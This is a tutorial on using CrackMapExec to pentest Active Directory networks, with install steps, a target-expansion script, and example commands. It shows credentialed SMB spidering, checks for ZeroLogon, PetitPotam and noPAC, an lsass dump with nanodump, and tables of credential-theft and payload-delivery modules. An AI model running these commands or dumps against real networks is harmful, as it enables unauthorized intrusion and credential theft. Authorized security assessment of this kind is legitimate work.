CrackMapExec

CrackMapExec Tutorial: Pentesting networks

CrackMapExec (also known as CME) is a post-exploitation program that assists in automating the security assessment of large Active Directory infrastructures.

CME was designed with stealth in mind: it abuses built-in Active Directory functionality and protocols to achieve its goals, which lets it evade most endpoint protection/IDS/IPS technologies.

How to Install CrackMapExec

If you are using Kali, you can install it from the Kali repos, but I recommend installing it from the git source.

apt install crackmapexec

In this article I will install it on a Linux machine, but if you need to, you can also run it on Windows or inside Docker.

First, let’s install some dependencies:

apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
git clone https://github.com/Porchetta-Industries/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec

Configure Databases

Configure new Certificate

CME Configuration folder

┌──(rfs㉿local-c2)-[~]
└─$ cd ~/.cme

Change CrackMapExec certificate

┌──(rfs㉿local-c2)-[~]
└─$ vi ~/.cme/cme.conf
┌──(rfs㉿local-c2)-[~]
└─$ openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem

Target Definition

crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
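The target notations above can be expanded into an explicit host list. The following is an added example (not CME's own code) that mirrors the notation shown here, so an analyst reviewing a recorded command line can see which hosts it would have touched; it assumes that a range such as `192.168.1.0-28` means the last octet runs from 0 to 28, and that a CIDR block covers every address in the block:

```python
"""Expand CrackMapExec-style target specifications into individual hosts.

Added example, not part of CME. Handles the five forms shown on this page:
hostname, single IP, CIDR block, last-octet range, and a file of targets.
Assumption: "a.b.c.x-y" means hosts a.b.c.x through a.b.c.y inclusive.
"""
import ipaddress
import os
import re
from typing import Iterable, List

# Last-octet range, e.g. "192.168.1.0-28" or "10.0.0.1-67"
_RANGE = re.compile(r"^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)(\d{1,3})-(\d{1,3})$")


def expand_spec(spec: str) -> List[str]:
    """Return the list of hosts a single target specification covers."""
    spec = spec.strip()
    if not spec:
        return []
    # A readable file holds one specification per line; '#' starts a comment
    path = os.path.expanduser(spec)
    if os.path.isfile(path):
        with open(path, encoding="utf-8") as fh:
            lines = [ln.split("#", 1)[0] for ln in fh]
        return [h for ln in lines for h in expand_spec(ln)]
    m = _RANGE.match(spec)
    if m:
        prefix, lo, hi = m.group(1), int(m.group(2)), int(m.group(3))
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad last-octet range: {spec}")
        return [f"{prefix}{i}" for i in range(lo, hi + 1)]
    if "/" in spec:
        # CIDR block: every address in the block, network and broadcast included
        try:
            return [str(a) for a in ipaddress.ip_network(spec, strict=False)]
        except ValueError:
            raise ValueError(f"not a CIDR block and not an existing file: {spec}")
    try:
        return [str(ipaddress.ip_address(spec))]  # single IP address
    except ValueError:
        return [spec]  # anything else is treated as a hostname


def expand_targets(specs: Iterable[str]) -> List[str]:
    """Expand several specifications, dropping duplicates but keeping order."""
    seen, out = set(), []
    for spec in specs:
        for host in expand_spec(spec):
            if host not in seen:
                seen.add(host)
                out.append(host)
    return out
```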

CME Supported Protocols

SMB
MSSQL
LDAP
SSH
RDP
WINRM

Samba Protocol

As an example, we will start by scanning a whole network and then a specific host on that network.

crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.91

Search Text Files

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --spider C\$ --pattern txt

CME SMB Modules

Vulnerabilities

SMB module    Description
zerologon     Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
petitpotam    Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
ms17-010      MS17-010, /!\ not tested outside home lab
dfscoerce     Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam
nopac         Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
shadowcoerce  Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam

Credentials

Module           Description
gpp_autologin    Searches the domain controller for registry.xml to find autologon information and returns the username and password.
gpp_password     Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
handlekatz       Get lsass dump using handlekatz64 and parse the result with pypykatz
hash_spider      Dump lsass recursively from a given hash using BH to find local admins
keepass_discover Search for KeePass-related files and process.
keepass_trigger  Set up a malicious KeePass trigger to export the database in cleartext.
lsassy           Dump lsass and parse the result remotely with lsassy
masky            Remotely dump domain user credentials via an ADCS and a KDC
teams_localdb    Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database; if Teams is open, all Teams processes are killed
wdigest          Creates/Deletes the ‘UseLogonCredential’ registry key enabling WDigest cred dumping on Windows >= 8.1
wireless         Get key of all wireless interfaces

Scan for Samba vulnerabilities with CME

ZeroLogon

crackmapexec smb <ip> -u '' -p '' -M zerologon

PetitPotam

crackmapexec smb <ip> -u '' -p '' -M petitpotam

noPAC

crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac

Nanodump

crackmapexec smb $TARGET -u Administrator -p 'qwerty12345' -M nanodump
[*] nanodump module options:

TMP_DIR             Path where process dump should be saved on target system (default: C:\Windows\Temp\)
NANO_PATH           Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME       Name of the nano executable (default: nano.exe)
DIR_RESULT          Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)

MSSQL Protocol

CrackMapExec modules for the MSSQL service.

MsSQL Modules

Module           Description
empire_exec      Uses Empire’s RESTful API to generate a launcher for the specified listener and executes it
met_inject       Downloads the Meterpreter stager and injects it into memory
mssql_priv       Enumerate and exploit MSSQL privileges
nanodump         Get lsass dump using nanodump and parse the result with pypykatz
test_connection  Pings a host
web_delivery     Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
